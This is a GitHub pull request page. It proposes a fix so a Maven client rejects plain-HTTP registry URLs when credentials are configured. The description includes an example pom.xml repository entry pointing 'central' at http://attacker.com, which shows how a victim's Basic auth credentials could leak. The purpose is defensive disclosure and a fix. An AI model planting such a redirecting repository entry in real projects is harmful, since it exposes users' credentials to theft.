clients/datasource: reject non-HTTPS Maven registry URLs when credentials configured#1931
Open
djvirus9 wants to merge 2 commits intogoogle:mainfrom
Open
clients/datasource: reject non-HTTPS Maven registry URLs when credentials configured#1931djvirus9 wants to merge 2 commits intogoogle:mainfrom
djvirus9 wants to merge 2 commits intogoogle:mainfrom
Conversation
…ials configured AddRegistry() and updateDefaultRegistry() now return an error when an attacker-supplied pom.xml attempts to redirect a registry ID that has credentials configured in settings.xml to a non-HTTPS URL. Root cause: pom.xml can declare a <repository> with any <id> and <url>. If the id matches a server entry in ~/.m2/settings.xml, AddRegistry() would accept the http:// URL, and the client would later respond to a 401 challenge by sending the victim's credentials in plaintext to the attacker-controlled endpoint. The fix checks whether credentials are configured for the incoming registry ID. If they are, any non-HTTPS and non-artifactregistry URL is rejected with a descriptive error before the registry is accepted. Fixes: google#1877 Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com>
|
Thanks for your pull request! It looks like this may be your first contribution to a Google open source project. Before we can look at your pull request, you'll need to sign a Contributor License Agreement (CLA). View this failed invocation of the CLA check for more information. For the most up to date status, view the checks section at the bottom of the pull request. |
Author
|
@googlebot I have signed the CLA! Please recheck. |
Author
|
@googlebot I have signed the CLA on 21st March, 2026 |
4 tasks
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
1 participant
Add this suggestion to a batch that can be applied as a single commit.This suggestion is invalid because no changes were made to the code.Suggestions cannot be applied while the pull request is closed.Suggestions cannot be applied while viewing a subset of changes.Only one suggestion per line can be applied in a batch.Add this suggestion to a batch that can be applied as a single commit.Applying suggestions on deleted lines is not supported.You must change the existing code in this line in order to create a valid suggestion.Outdated suggestions cannot be applied.This suggestion has been applied or marked resolved.Suggestions cannot be applied from pending reviews.Suggestions cannot be applied on multi-line comments.Suggestions cannot be applied while the pull request is queued to merge.Suggestion cannot be applied right now. Please check back later.
Description:
Fixes #1877
What this fixes
AddRegistry()andupdateDefaultRegistry()accept any URL from pom.xml withoutvalidating the scheme. If a victim has credentials configured in
~/.m2/settings.xmlfor a registry ID (e.g.
central), an attacker-controlled pom.xml can redirect that IDto an
http://endpoint. The client then responds to a 401 challenge by sending thevictim's credentials in plaintext.
Attack path:
<repository><id>central</id><url>http://attacker.com</url>AddRegistry()accepts the http URL, overriding the trusted registry for "central"registryAuths["central"]from settings.xmlWWW-Authenticate: BasicAuthorization: Basic <base64(user:pass)>→ credentials stolenFix
Before accepting a registry URL, check whether credentials are configured for that
registry ID. If they are, reject any non-HTTPS (and non-artifactregistry) scheme with a
descriptive error.
Tests
Added three tests in
maven_registry_auth_test.go:TestAddRegistryRejectsHTTPWhenCredentialsConfiguredTestUpdateDefaultRegistryRejectsHTTPWhenCredentialsConfiguredTestAddRegistryAllowsHTTPSWhenCredentialsConfigured